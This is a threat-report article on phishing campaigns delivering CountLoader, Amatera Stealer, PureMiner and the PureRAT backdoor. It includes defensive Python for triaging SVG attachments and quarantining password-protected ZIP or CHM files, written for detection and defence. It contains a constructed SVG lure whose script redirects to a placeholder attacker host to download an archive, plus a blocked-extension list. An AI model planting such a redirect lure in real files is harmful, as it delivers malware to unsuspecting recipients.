SVG and PureRAT Phishing Attacks: Ukraine & Vietnam Threat Report

by Anika Shah - Technology

Ukrainian Government Agencies Targeted in Phishing Campaign Delivering CountLoader, Amatera Stealer, and PureMiner


A new campaign has been observed impersonating Ukrainian government agencies in phishing attacks to deliver CountLoader, which is then used to drop Amatera Stealer and PureMiner.

“The phishing emails contain malicious Scalable Vector Graphics (SVG) files designed to trick recipients into opening harmful attachments,” Fortinet FortiGuard Labs researcher Yurren Wan said in a report shared with The Hacker News.

In the attack chains documented by the cybersecurity company, the email messages claim to be a notice from the National Police of Ukraine. The attached SVG files are used to initiate the download of a password-protected ZIP archive, which contains a Compiled HTML Help (CHM) file. The CHM file, when launched, activates a chain of events that culminates in the deployment of CountLoader.
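The lure described above relies on what an SVG can carry besides vector shapes: it is XML, so it can hold script blocks, event-handler attributes, clickable links and embedded HTML, all of which render in a browser. As an added example (this is not code from Fortinet's report), the following Python script does a static triage of an SVG attachment and flags the features a lure needs to redirect the viewer or start a download. The sample SVGs are constructed for the example and the host name in them is a placeholder on the reserved `.invalid` TLD.

```python
"""Static triage of an SVG e-mail attachment (added example, not from the report)."""
import xml.etree.ElementTree as ET

# Attribute names (namespace stripped) that carry a URL in SVG/XHTML.
LINK_ATTRS = {"href", "src", "action", "formaction", "data"}
# URL schemes that execute or inline content rather than pointing at a file.
ACTIVE_SCHEMES = ("javascript:", "vbscript:", "data:")
# Elements that have no business in an image a police notice would attach.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}


def _local(name: str) -> str:
    """Strip the '{namespace}' prefix ElementTree prepends to tags and attributes."""
    return name.rsplit("}", 1)[-1].lower()


def triage_svg(data: bytes) -> list:
    """Return human-readable findings; an empty list means nothing active was seen.

    The stdlib parser is used so the example runs offline; on a real gateway,
    parse untrusted XML with defusedxml (or disable entity expansion) to avoid
    entity-expansion bombs.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"parse-error: {exc}"]
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"{tag} element")
        for attr, value in el.attrib.items():
            name = _local(attr)
            val = value.strip()
            if name.startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif name in LINK_ATTRS:
                if val.lower().startswith(ACTIVE_SCHEMES):
                    findings.append(f"{val.split(':', 1)[0].lower()}: URL on <{tag}>")
                elif val.lower().startswith(("http://", "https://", "//")):
                    findings.append(f"external link on <{tag}>: {val}")
    return findings


def is_suspicious(data: bytes) -> bool:
    """Policy wrapper: any finding at all is enough to hold the attachment."""
    return bool(triage_svg(data))


# Constructed sample lure: a fake "notice" that both links to and auto-redirects
# to an archive on a placeholder host.
LURE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="600" height="400">
  <text x="20" y="40">National Police notice - click to view</text>
  <a xlink:href="https://attacker.invalid/notice.zip">
    <rect x="20" y="60" width="200" height="40" fill="#ddd"/>
  </a>
  <script>window.location.href = "https://attacker.invalid/notice.zip";</script>
</svg>"""

# Constructed benign sample: plain shapes, no links, no script.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="red"/>
</svg>"""

if __name__ == "__main__":
    for label, blob in (("lure", LURE_SVG), ("benign", BENIGN_SVG)):
        print(label, triage_svg(blob) or "clean")
```

An empty result is not a clean bill of health; it only says the file contains none of the active constructs this check looks for. A gateway that cannot afford to parse every SVG can instead treat `image/svg+xml` attachments from external senders like any other executable content type and block or detonate them.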

CountLoader, which was the subject of a recent analysis by Silent Push, has been found to drop various payloads like Cobalt Strike, AdaptixC2, and PureHVNC RAT. In this attack chain, however, it serves as a distribution vector for Amatera Stealer, a variant of ACRStealer, and PureMiner, a stealthy .NET cryptocurrency miner.

Evolving Phishing Campaign Leverages PureRAT Backdoor for Complete System Control

A recent cybersecurity campaign, detailed by Huntress researchers, demonstrates a significant evolution in tactics, techniques, and procedures (TTPs) employed by a threat actor. Starting with basic phishing lures, the campaign escalates through multiple layers of obfuscation and defense evasion to ultimately deploy the complex PureRAT remote access trojan (RAT), granting attackers full control over compromised systems. This progression highlights a maturing operator with increasing technical capabilities.

From Simple Phishing to Sophisticated Backdoor

The campaign begins with deceptively simple phishing emails designed to trick recipients into downloading malicious payloads. However, the attackers don't immediately deploy the final payload. Instead, they utilize a multi-stage approach:

* Initial Phishing Lure: The campaign starts with a basic phishing email, likely containing malicious attachments or links.
* In-Memory Loaders: Once executed, the initial payload leverages in-memory loaders to evade conventional file-based detection methods. These loaders decode and run the next stage inside process memory rather than writing it to disk, so file scanners never see the payload.
* Defense Evasion: The attackers employ techniques to bypass security software and remain undetected on the compromised system.
* Credential Theft: Before deploying the final payload, the attackers actively attempt to steal credentials, providing further access and persistence within the network.
* PureRAT Deployment: The culmination of this process is the deployment of PureRAT, a modular and professionally developed backdoor. Huntress describes PureRAT as providing attackers with "complete control over a compromised host."

Understanding PureRAT

PureRAT is a commercially available RAT: commodity malware sold to other criminals rather than a tool built for one campaign, which is why the same backdoor appears across unrelated intrusions. Its modular design allows operators to customize its functionality, adding capabilities like:

* File Management: Remote access to and manipulation of files on the compromised system.
* Keylogging: Recording keystrokes to capture usernames, passwords, and other sensitive details.
* Screenshot Capture: Taking screenshots of the victim’s screen.
* Remote Command Execution: Executing commands directly on the compromised system.
* Webcam Access: Accessing the victim’s webcam.
* Credential Harvesting: Stealing stored credentials from browsers and other applications.

The use of PureRAT signifies a shift from basic, quickly-developed malware to a more robust and feature-rich solution, indicating a more serious and dedicated threat actor.

The Significance of the Evolution

According to James Northey, a security researcher at Huntress, this campaign's evolution is noteworthy. He stated, "Their progression from amateurish obfuscation of their Python payloads to abusing commodity malware like PureRAT shows not just persistence, but also hallmarks of a serious and maturing operator."

This progression suggests the threat actor is:

* Learning and Adapting: They are actively refining their techniques based on the success (or failure) of previous attempts.
* Increasingly Sophisticated: They are moving beyond simple malware and utilizing more advanced tools and techniques.
* Focused on Long-Term Access: The multi-stage approach and use of a powerful RAT like PureRAT indicate a desire for sustained access to compromised systems.

Key Takeaways

* Phishing remains a primary attack vector: Even sophisticated campaigns often start with a simple phishing email.
* Multi-stage attacks are becoming more common: Attackers are using multiple layers of obfuscation and evasion to bypass security measures.
* Commodity malware is a significant threat: Off-the-shelf tools like PureRAT lower the bar for less capable actors and are reused across unrelated campaigns.
* Threat actors are evolving: Cybercriminals are constantly refining their techniques and becoming more sophisticated.

Protecting Against This Threat

Organizations should focus on a layered security approach to mitigate the risk of this type of campaign:

* Employee Training: Educate employees about phishing tactics and how to identify suspicious emails, including "official" notices that arrive as image or archive attachments.
* Email Security: Implement robust email filtering that blocks or detonates risky attachment types; the chains above rely on SVG, CHM and password-protected ZIP files, none of which a typical recipient needs from an external sender.
* Endpoint Detection and Response (EDR): Deploy EDR solutions to detect and respond to malicious activity on endpoints, in particular in-memory loaders and credential theft that leave little on disk.
* Network Segmentation: Segment the network to limit the impact of a successful breach.
* Regular Security Audits: Conduct regular security audits to identify and address vulnerabilities.
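The Fortinet chain described earlier on this page uses a password-protected ZIP precisely because a gateway cannot look inside it, with a CHM file as the next stage. As an added example of the email-filtering control above (not code from either vendor), the following Python implements an attachment policy for that pattern: quarantine any archive that contains an encrypted entry, and otherwise inspect the entries for CHM files by both extension and the `ITSF` magic bytes, so a renamed CHM is still caught. The blocked-extension list is an assumed policy, not one taken from the reports, and the fixture builder flips the ZIP "encrypted" flag by hand because Python's `zipfile` module cannot write password-protected archives.

```python
"""Attachment policy for the password-protected ZIP -> CHM chain (added example)."""
import io
import struct
import zipfile

CHM_MAGIC = b"ITSF"            # first bytes of every Compiled HTML Help file
ZIP_FLAG_ENCRYPTED = 0x0001    # general-purpose bit 0 in ZIP headers
# Assumed policy list: types Windows runs on double-click, plus SVG.
BLOCKED_EXT = {"chm", "hta", "js", "jse", "vbs", "vbe", "wsf", "scr", "lnk", "svg"}


def inspect_zip(data: bytes) -> dict:
    """Classify a ZIP attachment in memory; never extracts anything to disk."""
    reasons = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return {"verdict": "quarantine", "reasons": ["not a valid ZIP"]}
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if info.flag_bits & ZIP_FLAG_ENCRYPTED:
                # Contents are unreadable without the password, so the
                # archive is blocked on that fact alone.
                reasons.append(f"{name}: encrypted entry (password-protected)")
                continue
            if ext in BLOCKED_EXT:
                reasons.append(f"{name}: blocked extension .{ext}")
            with zf.open(info) as fh:
                # Magic-byte check catches a CHM hiding under a harmless name.
                if fh.read(4) == CHM_MAGIC and ext != "chm":
                    reasons.append(f"{name}: CHM magic bytes under a non-.chm name")
    return {"verdict": "quarantine" if reasons else "allow", "reasons": reasons}


def _set_encrypted_bit(raw: bytearray, off: int) -> None:
    (flags,) = struct.unpack_from("<H", raw, off)
    struct.pack_into("<H", raw, off, flags | ZIP_FLAG_ENCRYPTED)


def build_zip(entries: dict, mark_encrypted: bool = False) -> bytes:
    """Build a STORED ZIP in memory as a test fixture.

    zipfile cannot write password-protected archives, so when mark_encrypted
    is set the 'encrypted' flag is set by hand on the first entry, in both the
    local file header (flags at offset 6) and its central-directory record
    (flags at offset 8). The central-directory offset is read from the 22-byte
    end-of-central-directory record that closes a comment-less archive.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    raw = bytearray(buf.getvalue())
    if mark_encrypted:
        _set_encrypted_bit(raw, 6)
        (cd_off,) = struct.unpack_from("<I", raw, len(raw) - 6)
        _set_encrypted_bit(raw, cd_off + 8)
    return bytes(raw)


if __name__ == "__main__":
    # Constructed fake CHM: only the magic and a zeroed header, not a real file.
    chm = CHM_MAGIC + b"\x03\x00\x00\x00" + b"\x00" * 56
    samples = {
        "plain-chm": build_zip({"notice.chm": chm}),
        "encrypted": build_zip({"notice.chm": chm}, mark_encrypted=True),
        "renamed":   build_zip({"notice.txt": chm}),
        "clean":     build_zip({"report.txt": b"quarterly figures"}),
    }
    for label, blob in samples.items():
        print(label, inspect_zip(blob))
```

The policy deliberately does not try to guess the password from the email body, which is what the recipient is being coaxed into doing; an encrypted archive from an external sender is held, and the business case for releasing it is made out of band. Nested archives would need the same check applied recursively with a depth limit.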

This evolving threat landscape requires constant vigilance and a proactive security posture. As attackers continue to refine their techniques, organizations must adapt their defenses accordingly to stay ahead of the curve.
